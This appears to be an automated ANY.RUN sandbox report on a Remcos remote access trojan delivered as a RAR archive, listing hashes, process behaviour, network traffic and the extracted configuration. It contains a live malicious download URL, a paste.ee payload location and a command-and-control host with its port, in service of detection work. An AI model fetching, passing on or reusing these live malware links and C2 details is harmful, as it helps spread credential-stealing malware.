URL:

https://files.catbox.moe/lpxom5.rar

Full analysis: https://app.any.run/tasks/75880550-4524-40ad-a925-27f1eb3d63d8
Verdict: Malicious activity
Threats:

Remote access trojans (RATs) are a type of malware that enables attackers to establish complete to partial control over infected computers. Such malicious programs often have a modular design, offering a wide range of functionalities for conducting illicit activities on compromised systems. Some of the most common features of RATs include access to the users’ data, webcam, and keystrokes. This malware is often distributed through phishing emails and links.

Malware Trends Tracker     >>>
Analysis date: April 24, 2025, 08:53:23
OS: Windows 10 Professional (build: 19044, 64 bit)
Tags:
arch-scr
rat
remcos
remote
stealer
mpress
Indicators:
MD5:

41763A61ACEE96D1256C3CD1706EB940

SHA1:

87D7F499F5F4CAD11BF6AC3D454D740738DA4AFD

SHA256:

7D07CF4C78AC33976B3CE20E4BF80C4221677EA2A412DE2505F0849A9101475D

SSDEEP:

3:N8MW3xKIQ4X:2MW55X

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.

  • MALICIOUS

    • Creates internet connection object (SCRIPT)

      • wscript.exe (PID: 7748)

    • Opens an HTTP connection (SCRIPT)

      • wscript.exe (PID: 7748)

    • Sends HTTP request (SCRIPT)

      • wscript.exe (PID: 7748)

    • Run PowerShell with an invisible window

      • powershell.exe (PID: 6816)

    • Downloads the requested resource (POWERSHELL)

      • powershell.exe (PID: 6816)

    • Dynamically loads an assembly (POWERSHELL)

      • powershell.exe (PID: 6816)

    • REMCOS mutex has been found

      • MSBuild.exe (PID: 7780)

    • REMCOS has been detected

      • MSBuild.exe (PID: 7780)
      • MSBuild.exe (PID: 7780)

    • REMCOS has been detected (SURICATA)

      • MSBuild.exe (PID: 7780)

    • Actions looks like stealing of personal data

      • MSBuild.exe (PID: 924)
      • MSBuild.exe (PID: 2084)

    • Steals credentials from Web Browsers

      • MSBuild.exe (PID: 924)

    • REMCOS has been detected (YARA)

      • MSBuild.exe (PID: 7780)

  • SUSPICIOUS

    • Potential Corporate Privacy Violation

      • wscript.exe (PID: 7748)
      • powershell.exe (PID: 6816)

    • Base64-obfuscated command line is found

      • wscript.exe (PID: 7748)

    • Runs shell command (SCRIPT)

      • wscript.exe (PID: 7748)

    • Possibly malicious use of IEX has been detected

      • wscript.exe (PID: 7748)

    • Starts POWERSHELL.EXE for commands execution

      • wscript.exe (PID: 7748)

    • Probably obfuscated PowerShell command line is found

      • wscript.exe (PID: 7748)

    • The process bypasses the loading of PowerShell profile settings

      • wscript.exe (PID: 7748)

    • Executes script without checking the security policy

      • powershell.exe (PID: 6816)

    • Uses base64 encoding (POWERSHELL)

      • powershell.exe (PID: 6816)

    • Reads security settings of Internet Explorer

      • MSBuild.exe (PID: 7780)

    • Connects to unusual port

      • MSBuild.exe (PID: 7780)

    • Application launched itself

      • MSBuild.exe (PID: 7780)

    • Contacting a server suspected of hosting an CnC

      • MSBuild.exe (PID: 7780)

    • There is functionality for taking screenshot (YARA)

      • MSBuild.exe (PID: 7780)

  • INFO

    • Application launched itself

      • chrome.exe (PID: 5216)
      • firefox.exe (PID: 7260)
      • firefox.exe (PID: 8176)

    • Manual execution by a user

      • firefox.exe (PID: 8176)
      • WinRAR.exe (PID: 8140)
      • notepad++.exe (PID: 8172)
      • wscript.exe (PID: 7748)

    • Reads the software policy settings

      • slui.exe (PID: 7304)
      • slui.exe (PID: 7424)

    • Checks proxy server information

      • wscript.exe (PID: 7748)
      • powershell.exe (PID: 6816)
      • MSBuild.exe (PID: 7780)
      • slui.exe (PID: 7424)

    • Uses string replace method (POWERSHELL)

      • powershell.exe (PID: 6816)

    • Converts byte array into Unicode string (POWERSHELL)

      • powershell.exe (PID: 6816)

    • Disables trace logs

      • powershell.exe (PID: 6816)

    • Gets data length (POWERSHELL)

      • powershell.exe (PID: 6816)

    • Reads the computer name

      • MSBuild.exe (PID: 7780)
      • MSBuild.exe (PID: 8088)
      • MSBuild.exe (PID: 924)
      • MSBuild.exe (PID: 2084)

    • Reads the machine GUID from the registry

      • MSBuild.exe (PID: 7780)
      • MSBuild.exe (PID: 8088)
      • MSBuild.exe (PID: 924)

    • Checks supported languages

      • MSBuild.exe (PID: 7780)
      • MSBuild.exe (PID: 8088)
      • MSBuild.exe (PID: 924)
      • MSBuild.exe (PID: 2084)

    • Creates files or folders in the user directory

      • MSBuild.exe (PID: 7780)

    • Create files in a temporary directory

      • MSBuild.exe (PID: 8088)
      • MSBuild.exe (PID: 924)
      • MSBuild.exe (PID: 2084)

    • Creates files in the program directory

      • MSBuild.exe (PID: 7780)

    • Mpress packer has been detected

      • MSBuild.exe (PID: 7780)
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report

Remcos

(PID) Process(7780) MSBuild.exe
C2 (1)wizz111.duckdns.org:31688
BotnetAPRILL
Options
Connect_interval1
Install_flagFalse
Install_HKCU\RunTrue
Install_HKLM\RunTrue
Install_HKLM\Explorer\Run1
Setup_path%LOCALAPPDATA%
Copy_fileremcos.exe
Startup_valueRemcos
Hide_fileFalse
Mutex_nameRmc-P9USOJ
Keylog_flag1
Keylog_path%LOCALAPPDATA%
Keylog_filelogs.dat
Keylog_cryptFalse
Hide_keylogFalse
Screenshot_flagFalse
Screenshot_time5
Take_ScreenshotFalse
Screenshot_path%APPDATA%
Screenshot_fileScreenshots
Screenshot_cryptFalse
Mouse_optionFalse
Delete_fileFalse
Audio_record_time5
Audio_path%ProgramFiles%
Audio_dirMicRecords
Connect_delay0
Copy_dirRemcos
Keylog_dirremcos
Max_keylog_file100000
No Malware configuration.
No data.
screenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshot
All screenshots are available in the full report
All screenshots are available in the full report
Total processes
166
Monitored processes
35
Malicious processes
5
Suspicious processes
0

Behavior graph

Click at the process to see the details
start chrome.exe chrome.exe no specs chrome.exe no specs chrome.exe chrome.exe no specs chrome.exe no specs chrome.exe no specs chrome.exe no specs chrome.exe no specs sppextcomobj.exe no specs slui.exe chrome.exe no specs firefox.exe no specs firefox.exe firefox.exe no specs firefox.exe no specs firefox.exe no specs firefox.exe no specs firefox.exe no specs firefox.exe no specs firefox.exe no specs firefox.exe no specs rundll32.exe no specs winrar.exe no specs notepad++.exe no specs slui.exe wscript.exe powershell.exe conhost.exe no specs #REMCOS msbuild.exe msbuild.exe no specs msbuild.exe msbuild.exe msbuild.exe no specs svchost.exe

Process information

PID
CMD
Path
Indicators
Parent process
812"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\admin\AppData\Local\Google\Chrome\User Data\Crashpad" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=122.0.6261.70 --initial-client-data=0x1fc,0x220,0x224,0x1e0,0x228,0x7ffc8839dc40,0x7ffc8839dc4c,0x7ffc8839dc58C:\Program Files\Google\Chrome\Application\chrome.exechrome.exe
User:
admin
Company:
Google LLC
Integrity Level:
MEDIUM
Description:
Google Chrome
Exit code:
0
Version:
122.0.6261.70
Modules
Images
c:\program files\google\chrome\application\chrome.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\apphelp.dll
c:\windows\system32\aclayers.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\user32.dll
c:\windows\system32\win32u.dll
c:\windows\system32\gdi32.dll
924C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe /stext "C:\Users\admin\AppData\Local\Temp\vabqwvogjezzjfddtsjuxykyxj"C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
MSBuild.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
MSBuild.exe
Exit code:
0
Version:
4.8.9037.0 built by: NET481REL1
Modules
Images
c:\windows\microsoft.net\framework\v4.0.30319\msbuild.exe
c:\windows\system32\ntdll.dll
c:\windows\syswow64\ntdll.dll
c:\windows\system32\wow64.dll
c:\windows\system32\wow64win.dll
c:\windows\system32\wow64cpu.dll
c:\windows\syswow64\kernel32.dll
c:\windows\syswow64\kernelbase.dll
c:\windows\syswow64\msvcrt.dll
c:\windows\syswow64\user32.dll
976"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --no-appcompat-clear --gpu-preferences=WAAAAAAAAADgABAMAAAAAAAAAAAAAAAAAABgAAAAAAA4AAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --mojo-platform-channel-handle=1164 --field-trial-handle=1808,i,4274788144423769535,7092802509947169584,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction --variations-seed-version /prefetch:2C:\Program Files\Google\Chrome\Application\chrome.exechrome.exe
User:
admin
Company:
Google LLC
Integrity Level:
LOW
Description:
Google Chrome
Exit code:
0
Version:
122.0.6261.70
Modules
Images
c:\program files\google\chrome\application\chrome.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\apphelp.dll
c:\windows\system32\aclayers.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\user32.dll
c:\windows\system32\win32u.dll
c:\windows\system32\gdi32.dll
1012"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=1912 -parentBuildID 20240213221259 -prefsHandle 1848 -prefMapHandle 1840 -prefsLen 31031 -prefMapSize 244583 -appDir "C:\Program Files\Mozilla Firefox\browser" - {e2e9fee4-ab5d-4eb7-be42-c218c1f94450} 7260 "\\.\pipe\gecko-crash-server-pipe.7260" 1f9bacee810 gpuC:\Program Files\Mozilla Firefox\firefox.exefirefox.exe
User:
admin
Company:
Mozilla Corporation
Integrity Level:
MEDIUM
Description:
Firefox
Exit code:
1
Version:
123.0
Modules
Images
c:\program files\mozilla firefox\firefox.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\ucrtbase.dll
c:\program files\mozilla firefox\mozglue.dll
c:\windows\system32\msvcp140.dll
c:\windows\system32\vcruntime140.dll
c:\windows\system32\vcruntime140_1.dll
c:\windows\system32\crypt32.dll
1804"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=6 --mojo-platform-channel-handle=2972 --field-trial-handle=1808,i,4274788144423769535,7092802509947169584,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction --variations-seed-version /prefetch:1C:\Program Files\Google\Chrome\Application\chrome.exechrome.exe
User:
admin
Company:
Google LLC
Integrity Level:
LOW
Description:
Google Chrome
Exit code:
0
Version:
122.0.6261.70
Modules
Images
c:\program files\google\chrome\application\chrome.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\apphelp.dll
c:\windows\system32\aclayers.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\user32.dll
c:\windows\system32\win32u.dll
c:\windows\system32\gdi32.dll
2084C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe /stext "C:\Users\admin\AppData\Local\Temp\xugjxnzzfmretlrhccewidxhgpmwro"C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
MSBuild.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
MSBuild.exe
Exit code:
0
Version:
4.8.9037.0 built by: NET481REL1
Modules
Images
c:\windows\microsoft.net\framework\v4.0.30319\msbuild.exe
c:\windows\system32\ntdll.dll
c:\windows\syswow64\ntdll.dll
c:\windows\system32\wow64.dll
c:\windows\system32\wow64win.dll
c:\windows\system32\wow64cpu.dll
c:\windows\syswow64\kernel32.dll
c:\windows\syswow64\kernelbase.dll
c:\windows\syswow64\msvcrt.dll
c:\windows\syswow64\rpcrt4.dll
2092\??\C:\WINDOWS\system32\conhost.exe 0xffffffff -ForceV1C:\Windows\System32\conhost.exepowershell.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Console Window Host
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\conhost.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\shcore.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\combase.dll
c:\windows\system32\rpcrt4.dll
2196C:\WINDOWS\system32\svchost.exe -k NetworkService -p -s DnscacheC:\Windows\System32\svchost.exe
services.exe
User:
NETWORK SERVICE
Company:
Microsoft Corporation
Integrity Level:
SYSTEM
Description:
Host Process for Windows Services
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\svchost.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\bcrypt.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\combase.dll
c:\windows\system32\kernel.appcore.dll
2432"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --disable-quic --no-appcompat-clear --mojo-platform-channel-handle=2204 --field-trial-handle=1808,i,4274788144423769535,7092802509947169584,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction --variations-seed-version /prefetch:8C:\Program Files\Google\Chrome\Application\chrome.exechrome.exe
User:
admin
Company:
Google LLC
Integrity Level:
LOW
Description:
Google Chrome
Exit code:
0
Version:
122.0.6261.70
Modules
Images
c:\program files\google\chrome\application\chrome.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\apphelp.dll
c:\windows\system32\aclayers.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\user32.dll
c:\windows\system32\win32u.dll
c:\windows\system32\gdi32.dll
3032C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe /stext "C:\Users\admin\AppData\Local\Temp\vabqwvogjezzjfddtsjuxykyxj"C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeMSBuild.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
MSBuild.exe
Exit code:
0
Version:
4.8.9037.0 built by: NET481REL1
Modules
Images
c:\windows\microsoft.net\framework\v4.0.30319\msbuild.exe
c:\windows\system32\ntdll.dll
c:\windows\syswow64\ntdll.dll
Total events
23 345
Read events
23 327
Write events
17
Delete events
1

Modification events

(PID) Process:(5216) chrome.exeKey:HKEY_CURRENT_USER\SOFTWARE\Google\Chrome\BLBeacon
Operation:writeName:failed_count
Value:
0
(PID) Process:(5216) chrome.exeKey:HKEY_CURRENT_USER\SOFTWARE\Google\Chrome\BLBeacon
Operation:writeName:state
Value:
2
(PID) Process:(5216) chrome.exeKey:HKEY_CURRENT_USER\SOFTWARE\Google\Chrome\BLBeacon
Operation:writeName:state
Value:
1
(PID) Process:(5216) chrome.exeKey:HKEY_CURRENT_USER\SOFTWARE\Google\Chrome\StabilityMetrics
Operation:writeName:user_experience_metrics.stability.exited_cleanly
Value:
0
(PID) Process:(5216) chrome.exeKey:HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Google\Update\ClientStateMedium\{8A69D345-D564-463C-AFF1-A69D9E530F96}
Operation:writeName:usagestats
Value:
0
(PID) Process:(5216) chrome.exeKey:HKEY_CURRENT_USER\SOFTWARE\Google\Chrome\StabilityMetrics
Operation:writeName:user_experience_metrics.stability.exited_cleanly
Value:
1
(PID) Process:(5216) chrome.exeKey:HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
Operation:delete valueName:GoogleChromeAutoLaunch_A822CA3D40D4B8944864CFEA751D8D57
Value:
(PID) Process:(7260) firefox.exeKey:HKEY_CURRENT_USER\SOFTWARE\Mozilla\Firefox\DllPrefetchExperiment
Operation:writeName:C:\Program Files\Mozilla Firefox\firefox.exe
Value:
0
(PID) Process:(8140) WinRAR.exeKey:HKEY_CURRENT_USER\SOFTWARE\WinRAR\FileList\FileColumnWidths
Operation:writeName:name
Value:
120
(PID) Process:(8140) WinRAR.exeKey:HKEY_CURRENT_USER\SOFTWARE\WinRAR\FileList\FileColumnWidths
Operation:writeName:size
Value:
80
Executable files
0
Suspicious files
199
Text files
52
Unknown types
3

Dropped files

PID
Process
Filename
Type
5216chrome.exeC:\Users\admin\AppData\Local\Google\Chrome\User Data\Default\commerce_subscription_db\LOG.old~RF10d5b1.TMP
MD5:
SHA256:
5216chrome.exeC:\Users\admin\AppData\Local\Google\Chrome\User Data\Default\commerce_subscription_db\LOG.old
MD5:
SHA256:
5216chrome.exeC:\Users\admin\AppData\Local\Google\Chrome\User Data\Default\parcel_tracking_db\LOG.old~RF10d5c0.TMP
MD5:
SHA256:
5216chrome.exeC:\Users\admin\AppData\Local\Google\Chrome\User Data\Default\parcel_tracking_db\LOG.old
MD5:
SHA256:
5216chrome.exeC:\Users\admin\AppData\Local\Google\Chrome\User Data\Default\PersistentOriginTrials\LOG.old~RF10d5c0.TMP
MD5:
SHA256:
5216chrome.exeC:\Users\admin\AppData\Local\Google\Chrome\User Data\Default\PersistentOriginTrials\LOG.old
MD5:
SHA256:
5216chrome.exeC:\Users\admin\AppData\Local\Google\Chrome\User Data\Default\chrome_cart_db\LOG.old~RF10d5c0.TMP
MD5:
SHA256:
5216chrome.exeC:\Users\admin\AppData\Local\Google\Chrome\User Data\Default\coupon_db\LOG.old~RF10d5c0.TMP
MD5:
SHA256:
5216chrome.exeC:\Users\admin\AppData\Local\Google\Chrome\User Data\Default\discounts_db\LOG.old~RF10d5c0.TMP
MD5:
SHA256:
5216chrome.exeC:\Users\admin\AppData\Local\Google\Chrome\User Data\Default\chrome_cart_db\LOG.old
MD5:
SHA256:
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests
18
TCP/UDP connections
76
DNS requests
105
Threats
15

HTTP requests

PID
Process
Method
HTTP Code
IP
URL
CN
Type
Size
Reputation
7260
firefox.exe
GET
200
34.107.221.82:80
http://detectportal.firefox.com/canonical.html
unknown
whitelisted
7260
firefox.exe
POST
200
142.250.181.227:80
http://o.pki.goog/we2
unknown
whitelisted
7260
firefox.exe
GET
200
34.107.221.82:80
http://detectportal.firefox.com/success.txt?ipv4
unknown
whitelisted
7260
firefox.exe
POST
200
184.24.77.74:80
http://r11.o.lencr.org/
unknown
whitelisted
7260
firefox.exe
POST
200
142.250.181.227:80
http://o.pki.goog/s/wr3/FIY
unknown
whitelisted
7260
firefox.exe
POST
200
184.24.77.74:80
http://r11.o.lencr.org/
unknown
whitelisted
GET
200
23.48.23.156:80
http://crl.microsoft.com/pki/crl/products/MicRooCerAut2011_2011_03_22.crl
unknown
whitelisted
7748
wscript.exe
GET
301
23.186.113.60:80
http://paste.ee/d/jMxTnyJf/0
unknown
shared
7260
firefox.exe
POST
200
184.24.77.65:80
http://r10.o.lencr.org/
unknown
whitelisted
7780
MSBuild.exe
GET
200
178.237.33.50:80
http://geoplugin.net/json.gp
unknown
whitelisted
Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Connections

PID
Process
IP
Domain
ASN
CN
Reputation
4.231.128.59:443
MICROSOFT-CORP-MSN-AS-BLOCK
IE
whitelisted
23.48.23.156:80
crl.microsoft.com
Akamai International B.V.
DE
whitelisted
23.35.229.160:80
www.microsoft.com
AKAMAI-AS
DE
whitelisted
2104
svchost.exe
4.231.128.59:443
MICROSOFT-CORP-MSN-AS-BLOCK
IE
whitelisted
4
System
192.168.100.255:138
whitelisted
3216
svchost.exe
172.211.123.248:443
client.wns.windows.com
MICROSOFT-CORP-MSN-AS-BLOCK
FR
whitelisted
4380
chrome.exe
108.181.20.35:443
files.catbox.moe
TELUS Communications
CA
malicious
5216
chrome.exe
239.255.255.250:1900
whitelisted
4380
chrome.exe
142.251.173.84:443
accounts.google.com
GOOGLE
US
whitelisted
6544
svchost.exe
40.126.31.0:443
login.live.com
MICROSOFT-CORP-MSN-AS-BLOCK
IE
whitelisted

DNS requests

Domain
IP
Reputation
crl.microsoft.com
  • 23.48.23.156
  • 23.48.23.143
whitelisted
www.microsoft.com
  • 23.35.229.160
whitelisted
google.com
  • 142.250.184.206
whitelisted
client.wns.windows.com
  • 172.211.123.248
  • 172.211.123.249
whitelisted
files.catbox.moe
  • 108.181.20.35
malicious
accounts.google.com
  • 142.251.173.84
whitelisted
login.live.com
  • 40.126.31.0
  • 20.190.159.68
  • 40.126.31.131
  • 20.190.159.128
  • 20.190.159.4
  • 40.126.31.3
  • 20.190.159.130
  • 40.126.31.71
whitelisted
ocsp.digicert.com
  • 2.17.190.73
whitelisted
sb-ssl.google.com
  • 142.250.184.206
whitelisted
www.google.com
  • 172.217.16.196
whitelisted

Threats

PID
Process
Class
Message
4380
chrome.exe
Potentially Bad Traffic
ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)
7260
firefox.exe
Potentially Bad Traffic
ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)
7260
firefox.exe
Potentially Bad Traffic
ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)
2196
svchost.exe
Misc activity
ET INFO Pastebin-like Service Domain in DNS Lookup (paste .ee)
7748
wscript.exe
Potential Corporate Privacy Violation
ET INFO Pastebin-style Service (paste .ee) in TLS SNI
6816
powershell.exe
Potential Corporate Privacy Violation
ET INFO Pastebin-style Service (paste .ee) in TLS SNI
2196
svchost.exe
Potentially Bad Traffic
ET DYN_DNS DYNAMIC_DNS Query to a *.duckdns .org Domain
2196
svchost.exe
Misc activity
ET DYN_DNS DYNAMIC_DNS Query to *.duckdns. Domain
2196
svchost.exe
Potentially Bad Traffic
ET DYN_DNS DYNAMIC_DNS Query to a *.duckdns .org Domain
2196
svchost.exe
Misc activity
ET DYN_DNS DYNAMIC_DNS Query to *.duckdns. Domain
No debug info
Interactive malware hunting service ANY.RUN
© 2017-2025 ANY.RUN ALL RIGHTS RESERVED
ANY.RUN
Reports
https://files.catbox.moe/lpxom5.rar